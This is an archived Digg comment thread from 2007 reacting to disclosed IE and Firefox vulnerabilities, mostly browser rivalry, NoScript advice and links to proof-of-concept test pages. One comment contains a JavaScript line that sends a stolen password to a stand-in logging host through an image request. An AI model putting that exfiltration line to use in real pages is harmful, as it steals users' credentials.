What is Digg?114 Comments
- Prysorra, on 10/11/2007, -4/+93Note for people burying this to "keep it off the front page".
....The hackers already know! - FKnight, on 10/11/2007, -13/+61Just remember....
[troll]
If the hole is in IE, it's Microsoft's fault.
If the hole is in Firefox, it's the "stupid" user's fault.
[/troll]
[waiting for bury] - chrono13, on 10/11/2007, -2/+48Most browser exploits, present, past and likely future are through explicitly executable code (Javascript, Java, Flash, Shockwave, Silverlight...). Most notably Javascript.
While not a full security solution in itself, NoScript ( http://noscript.net/ ) provides an easy and effective way to Block_All and white-list, either temporarily (session) or permanently, any website you feel needs scripting.
I turn my NoScript to block all scripting and plugins. It makes surfing faster and safer with very little cost (occasional whitelisting). Once you whitelist your oft-used sites, you don't have to fuddle with it much. And there are "Untrusted" entries which are separate and less likely for you to accidentally unblock.
As a further testament to it's security, when allowing scripting for a site, the current site is shown in bold and can be allowed scripting for that site only, while the other *six or seven* sites asking for scripting on that page you can simply avoid. If I'm on dailyfunnyflashvideoFoo.com, there is no reason Google analytics, coolweb, CrossScriptAttack.ms, and other websites need scripting permissions as well.
This cuts down on cross site scripting. And by "down" I mean virtually eliminates. - tsupersonic, on 10/11/2007, -8/+48How about Opera? (pls don't start Firefox vs. Opera)
- maninblac1, on 10/11/2007, -3/+41A race condition is hardly an attack vector. This attack had to execute for a minute and a half flipping back and forth between pages before it succeeded on my machine. In the meantime it just when click crazy with sounds so i think that that alone would be obvious enough.
Obviously it has a serious implication, but it's not practical. Even on 2 identical computers there is no way of writing attack code that will perform the same way on them. Thus is the very nature of a race condition. It's across the board after all, it even effects IE7x64 in vista in protected mode. I'm not too concerned about race conditions as security flaws, too uncertain.
I don't know, overall it doesn't seem such huge deal, any of the advertised exploits. - Roger, on 10/11/2007, -3/+37And you still clicked the link?
- feoza, on 10/11/2007, -14/+47When I saw the title I was about to post "Firefox FTW!!!" but now that Firefox is part of the guilty squad it's no fun :(
Ah what the hell.....Firefox FTW!!!! - r2builder, on 10/11/2007, -8/+41"gaping holes" in a title = instant digg from me.
- inactive, on 10/11/2007, -2/+27^The one above affects IE^
Here is the Firefox Exploit Test Page: http://lcamtuf.coredump.cx/ifsnatch/ - Dp462090, on 10/11/2007, -0/+22If you don't associate the phrase "gaping hole," with a certain image, consider yourself lucky.
- MarksALot, on 10/11/2007, -3/+23@sirber
You've obviously never used NoScript. It works exactly as @chrono13 has described.
You should install it and use it. - se7en11, on 10/11/2007, -0/+18Because you're from Utah?
- inactive, on 10/11/2007, -3/+20(Comment Abuse)
Here is the Test Page: http://lcamtuf.coredump.cx/ierace/ - TheNameless88, on 10/11/2007, -2/+19Digging up for truth.
I use Firefox, and I find this disturbing, but am I going to be in denial? Nope. There's nothing you can do to be perfectly safe, but at least he's disclosing them, instead of a bad guy using them. - zepolen, on 10/11/2007, -21/+34Opera FTW!
- bsiviglia9, on 10/11/2007, -0/+12Remember when computers were fun -- back in the 1900's before "security"?
- frednofr, on 10/11/2007, -1/+11"Zalewski also dropped details of a “major” Firefox cross-site IFRAME hijacking bug that could allow malicious code execution, keystroke interception and content spoofing attacks."
- msgyrd, on 10/11/2007, -2/+10You can add pages to the list of authorized script sources, and admittedly it is quite annoying at first. Most people only visit a handful a pages that actually needs javascript though, so once you've completed the process, browsing speed is much faster and you don't need to worry as much about random javascript being executed (google analytics is often a major culprit of slow page loading).
- Eldorian, on 10/11/2007, -15/+22Firefox FTW simply because I bet their holes get patched sooner than IE :)
- HigherLogic, on 10/11/2007, -1/+8It's refreshing to see Firefox users getting a taste of their own medicine when they used to (well, they still do) tell everyone to switch to Firefox because "it was more secure." The same counter-argument was used that less people use it, so of course there are going to be more vulnerabilites on IE. How does it taste?
Fact time. According to Secunia, Opera 9.x has had 4 security vulnerabilites. All of which are currently patched.
But that's not fair, let's look at Firefox when it was still in v1.x: Firefox 1.x had 39 vulnerabilities, 35 were patched. Compare that to Opera 8.x with 15 vulnerabilities, 15 patched; IE 6.x with 110 vulnerabilities, 91 patched; and Safari 1.x with 15 vulnerabilities, 14 patched).
But we all know that's just a silly argument, no point in slamming it down someone's throat :)
http://www.answers.com/topic/features-of-the-opera-internet-suite - Kickboy, on 10/11/2007, -1/+7It is interesting to note that according to the comments on Bugzilla, the Firefox 2.0 bug has already been fixed in the trunk. Which means the next security update for firefox (probably 2.0.0.5) will include a fix for this bug.
Hows that for fast response?
Here's the bugzilla page: https://bugzilla.mozilla.org/show_bug.cgi?id=381300#c4 - gioma1, on 10/11/2007, -0/+5
new Image().src="http://mypassworddatabase.com/log.php?password=" + escape(stolenPassword);
--
There's a browser safer than Firefox... Firefox, with NoScript - http://noscript.net - zepolen, on 10/11/2007, -6/+11You make me resent being an Opera user. ***** fanboy.
- feoza, on 10/11/2007, -1/+5Was thinking the same thing, it's been on the upcoming page forever.
- UtahApocalyse, on 10/11/2007, -2/+6Why was I expecting goatse
- BlackOp, on 10/11/2007, -1/+5It's definitely true that Opera is years ahead of anything else. If the other browser* fanboys actually gave it a chance most of them would love it.
@ hagnar It does have ad blocking. I also use a hosts file from http://everythingisnt.com/hosts.html
Don't know about importing your blocklist, depends on what format it's stored in. If it's stored as a list of plaintext urls, you can probably just paste it under the [exclude] part of urlfilter.ini in your profile folder. You can also get lists for opera like this http://my.opera.com/Tamil/blog/index.dml/tag/urlfilter.ini
*trying to avoid a war - trogdoor, on 10/11/2007, -0/+4Because they are all in your head?
A quick search of this page shows that you and I are ( as of this comment ) the only two people who have even used the word Linux in a comment. - mrmacky, on 10/11/2007, -0/+3Almost all software has an exploit... the only software I've ever written that has NO exploit whatsoever is "Hello, World!"
At any given rate, this doesn't effect me much, I'm not one for visiting malicious sites.
The keystroke detection thing scares me a bit however. I wonder if it can ACTUALLY be used to intercept a password. (Store it, and later transmit the data, as opposed to just detecting what you entered)
I'm going to switch back to Lynx or Gopher... all these new phangled browsers with their silly IFRAMES and Flash advertisements, who needs 'em. - covertbadger, on 10/11/2007, -0/+3One of those links is talking about an ancient version of Firefox and openly admits that Firefox 2 sorts a lot of the problems out, and your other two links both go to the same page, on which the author concludes that he prefers Firefox.
Not very good at this, are you? - charityjustice, on 10/11/2007, -3/+6Wow, if the Firefox exploit allowed "malicious code execution, keystroke interception" but only the IE vulnerability was listed as Critical, that must have been some catastrophic IE bug! Heck, a little keylogging never hurt anyone.
Methinks I detect some pro-Firefox, anti-MS sentiment in that article... - takeda, on 10/11/2007, -1/+3"I'll switch to opera as soon as it has ad blocking - and the ability to import my block list."
http://operawiki.info/OperaAdblock
http://help.opera.com/Windows/9.00/en/contentblock.html
As for the format, it's just a text file (urlfilter.ini) with masks of URL links, I belive AdBlock uses similar format, so it should be as easy as copy&paste)
Welcome, new Opera user :D - MrKC, on 10/11/2007, -0/+2Use NoScript in Firefox. Block the test links using NoScript and see what happens.
- dkoon, on 10/11/2007, -5/+7but... but... according to digg.com Firefox is invincible, un-hackable, bug-free because it's open source...
- inactive, on 10/11/2007, -1/+3Opera rules.
- escapologist, on 10/11/2007, -0/+2You obviously don't use NoScript. Bad for you.
- mlw4428, on 10/11/2007, -1/+3For firefox (v2.0.0.4):
The keylogging one worked for me. The dialog suppressing one worked for me as well (had to keep pressing enter however). Troubling... - chrismgtis, on 10/11/2007, -0/+2If you have a problem with NoScript, the ease of use or for any matter at all, don't complain, your mom doesn't know how to program a VCR either. It's ok.
- chrisc262, on 10/11/2007, -1/+3i think it was broadband that made it so much easier to attack unsuspecting internet users
especially due to the exorbitant amount of flash/java/etc ads there are now - tdous, on 10/11/2007, -1/+3@dkoon
No, no, you're thinking of Slashdot.
Here it's because it runs on a Mac. - inactive, on 10/11/2007, -2/+3or you use VMWARE, use a linked cloned a good image, for surfing, once your computer fucts up, delete the clone and make another one. clones only take about 30 seconds to create, the only part that is time consuming is installing windows in the VMWARe image, but that takes 10 mins if you stream the disc on a GB Lan
or surf with your common sense and not your dick, just STOP DOWNLOADING PORN - inactive, on 10/11/2007, -7/+8Sorry, triple post!
I have performed all these tests on my Mac using the most popular web browsers. Here are the results: PDF WARNING!!!! http://www.ownerofearth.com/TEST.pdf - inactive, on 10/11/2007, -5/+6The jokes practically write themselves!
- imacashew, on 10/11/2007, -5/+6yep, security through obscurity. Apple rode that wave for a pretty long while till lately.
http://www.informationweek.com/news/showArticle.jhtml?articleID=199200243
Hoisted by their own petard. - inactive, on 10/11/2007, -4/+5i assume the ppl that gave me neg is because i didnt give reasons.
well here they are why opera is better than FF/IE
http://www.digitalalchemy.tv/2006/10/10-reasons-why-opera-is-better-than.html
http://nedwolf.com/Firefox-Opera-Comparison.htm
http://digg.com/software/Is_Opera_Better_Than_Firefox_ - benlindelof, on 10/11/2007, -0/+1P.S.S. Yes, you can fix these problems on the client side or the server side. It's nice when browsers protect you, but the servers are ultimately responsible for ensuring that the data sent out cannot be used by an unintended recipient. Server administrators will disagree...
- inactive, on 10/11/2007, -2/+3Another intelligent human being using Digg. Nice :)
- benlindelof, on 10/11/2007, -0/+1I've been warning web server operators and administrators about this.
They act stupid and say things like "Prove it!". I remind them I don't work for them. Please fix your security issues.
Whether or not they do so is not my concern. This guy who released this secure information is a hero because he has the guts (that I don't) to show you where you are vulnerable.
Guess what happens when I show someone where they are vulnerable? They get pissed off. Guess what? I don't do that anymore.
It's a sticky situation! Don't get into it if you are emo! The computer has no feelings. Learn to code without emotion and I think you will do alot better.
If you are not in the internet security business, don't freak out. We are working on it. For now, everything is monitored so we can track what is happening. This way nothing goes undetected and can be later analyzed.
You're in good hands.
P.S. The grammar police and spelling police spam has got to stop. No one cares if someone's keyboard is acting up and they "mispell" words, and we are all getting tired of the spelling and grammar fixes. It's unwanted. That means it's spam. Stop doing it. - hackeron, on 10/11/2007, -1/+2Because we get sick and tired of reading about Firefox and other security flaws that only affect Windows users -- If the headline was "Gaping holes exposed in Windows running any web browser" we wouldn't waste our time clicking on the link.
- HigherLogic, on 10/11/2007, -2/+2Nope, it's all good on my end. The IE one just kept switching back and forth between a Polish version of Google or something, after a minute I got bored and closed it. The Fx one just opened up CNN and blocked a pop-up. Ah, Opera FTRW.
- FutureGuy, on 10/11/2007, -2/+2the article disclosed more then one bug with Firefox and the iframe one
"Mozilla developers are tracking the issue, which is a variant of a bug that has haunted Firefox since 2006."
its better to fully patch a bug then release a half backed one. -
Show 51 - 100 of 109 discussions
© Digg Inc. 2009
— Content created and posted by Digg users is